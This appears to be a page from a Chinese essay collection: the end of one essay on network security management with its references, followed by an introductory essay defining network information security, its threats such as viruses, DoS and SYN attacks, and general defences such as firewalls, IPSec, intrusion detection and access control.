总而言之, 新形势下的计算机网络信息安全管理工作已经逐步迈向了系统化、集成化、多元化。但目前网络信息安全问题还比较突出, 只有强化思想认识, 健全完善制度;合理配置资源, 切实加强防范;强化等级保护, 保障信息安全;落实专业措施, 确保安全运行, 才能真正起到加强计算机网络信息安全防护的最终目的。

参考文献

[1]段盛.企业计算机网络信息管理系统可靠性探讨[J].《湖南农业大学学报:自然科学版》.2000 (26) :134-136.

[2]李晓琴;张卓容.医院计算机网络信息管理的设计与应用[J].《医疗装备》.2003 (16) :109-113.

[3]李晓红.妇幼保健信息计算机网络管理系统的建立与应用[J].《中国妇幼保健》.2010 (25) :156-158.

[4]罗宏俭.计算机网络信息技术在公路建设项目管理中的应用[J].《交通科技》.2009 (1) :120-125.

[5]刘永华.基于Agent的分布式入侵检测系统[J].《潍坊学院学报》.2006 (3) .

[6]蔡洪民;伍乃骇;滕少华.局域网络安全扫描系统的设计与实现[J].《微计算机应用》.2005 (1) :45-48.

[7]金洲.计算机网络安全的管理与技术[J].《现代营销》.2010 (4) :51-53

浅谈网络信息安全 篇10

关键词:网络信息,计算机,安全

1 什么是网络信息安全

网络信息安全分为两大范畴, 分别是网络安全和信息安全。网络安全主要指信息的传播载体网络部分的安全实施, 包括网络硬件方面, 主要是硬件、操作系统、各种软件等等。信息安全主要指包容信息本身的数据的安全, 在对各种攻击的情况下能确保不会遭到更改、破坏、泄露等等。

1.1 网络信息安全的内容

1) 软件安全。即计算机及其网络中的操作系统以及各种软件不被修改或破坏, 不被非法操作或误操作, 功能不会失效, 不被非法复制和窃取。2) 硬件安全。即网络硬件和存储器的安全。要保护这些硬设施不受侵入和控制, 能够正常运行。3) 运行安全。即网络中的各个信息系统能够正常运行并能正常地通过网络交流信息。通过对网络系统中的各种设备运行状况的监测, 发现不安全因素能及时报警并采取措施改变不安全状态, 保障网络系统正常运行。4) 数据安全。即网络中存储及流通数据的安全。要保护网络中的数据不被篡改、非法增删、复制、解密、显示、使用等。它是保障网络安全最根本的目的。

1.2 网络信息安全的目标

真实性:依据标准进行信息来源的判断, 并且对伪造的信息予以鉴别。

保密性:确保机密信息无法被窃听, 或者使用编码技术以使信息即时泄露也无法被破解。

完整性:确保数据完整一致, 无法被随意修改。

可用性:随时随地满足合法用户对信息和资源的使用要求。

可控性:具有控制信息传播方式和传播内容的绝对控制能力。

可审查性:在出现问题之后能够提供所有调查所需的依据和手段。

责任可查性:具备完善有效的责任机制, 能够确实可行的落实到每一个使用者。

2 网络信息安全面临的问题

2.1 内部管理安全

由于相关人员缺乏网络信息安全基本知识, 信息保存、流转、归档不遵守本部门的信息安全规则, 造成数据损失等。由于技术措施不到位, 只考虑防火墙、防病毒等基本技术安全方法。

2.2 感染病毒风险

随着网络的迅速发展, 计算机病毒呈现出多样化、破坏力强、速度快、难以防范等特点。不论是在互联网上进行浏览网页、下载文件、收发E-mail, 还是计算机之间文件的拷贝, 都有可能使计算机系统感染病毒。

2.3 技术层面

物理层的安全问题包括计算机硬件、网络设备遭受环境事故、自身故障以及人为操作失误等造成的损失。网络层的安全问题指非法用户与非授权的客户的非法使用, 而造成网络路由错误, 信息被拦截或监听。系统层的安全性也是一个主要问题, 目前流行的许多操作系统都存在网络安全漏洞。应用层作为直接面向最终用户的层面。其安全问题包括合法性使用、规范化操作、信息泄漏、系统本身安全漏洞等。

2.4 非法入侵

黑客活动比病毒破坏更具目的性, 会对系统造成更大的破坏。例如因特网控制信息协议 (ICMP) 被用来进行拒绝服务攻击, 它是一种比较简单而且很流行的攻击。攻击者只要向被攻击的服务器发送大量信息, 就能使web服务器、主机、路由器和其他网络设备无法承受如此大的信息流, 网络反应速度减慢或严重瘫痪, 使用户无法访问网络。黑客攻击方式还有源地址欺骗、路由选择信息协议攻击、SYN攻击等等。

3 网络信息安全防范措施

3.1 外部入侵的防范措施

1) 网络加密 (Ips e c) 。IP层是TCP/IP协议中最主要的一层, IP作为网络层协议, 其安全机制可对其上各层服务提供透明的覆盖式安全保护。IP安全是整个TCP/IP安全的基石, 是网络安全的重心所在。IPSe c是能为任何形式的Inte rne t通信提供安全保障的协议。IPSe c允许提供单个数据流或者单个连接的安全, 所以是实现最细致安全控制必然选择。

2) 防火墙。防火墙有软、硬件之分。软件防火墙运行于特定的计算机上, 它需要计算机操作系统的支持。硬件防火墙是基于专用的硬件平台的防火墙系统, 也是基于PC架构, 运行一些经过裁剪和简化的操作系统。

3) 入侵检测。入侵检测产品是和防火墙联动, 用来监视局域网外部绕过或穿过防火墙的攻击, 并及时触发联动的防火墙及时关闭该连接;同时可以监视主服务器网段的异常行为, 以防止来自局域网内部的攻击或无意的误用及滥用行为。入侵检测是防火墙的合理补充, 帮助系统对付网络攻击, 扩展了系统管理员的安全管理能力。

3.2 内部非法活动的防范措施

1) 身份认证。身份认证是网络安全的第一道防线, 也是最重要的一道防线。用户在访问安全系统之前, 首先经过身份认证系统识别身份, 然后访问监控器根据用户的身份和授权数据库决定用户是否能够访问某个资源。授权数据库由安全管理员按照需要进行配置。黑客攻击的目标往往就是身份认证系统, 因此身份认证实在是网络安全的关键。

2) 访问控制。访问控制决定了用户可以访问的网络范围、使用的协议、端口;能访问系统的何种资源以及如何使用这些资源。

3) 流量监测。目前有很多因素造成网络的流量异常, 如拒绝服务攻击 (Do S) 、网络蠕虫病毒的传播、一些网络扫描工具产生的大量TCP连接请求等, 很容易使网络设备瘫痪。这些网络攻击, 都是利用系统服务的漏洞或利用网络资源的有限性, 在短时间内发动大规模网络攻击, 消耗特定资源, 造成网络或计算机系统瘫痪。因此监控网络的异常流量非常重要。

4) 漏洞扫描。对一个网络系统而言, 存在不安全隐患, 将是黑客攻击得手的关键因素。就目前的网络系统来说, 在硬件、软件、协议的具体实现或系统安全策略方面都可能存在一定的安全缺陷即安全漏洞。及时检测出网络中每个系统的安全漏洞是至关重要的。定期对网络系统进行漏洞扫描, 可以主动发现安全问题并在第一时间完成有效防护, 让攻击者无隙可钻。

上一篇:多点执业下一篇:儿童败血症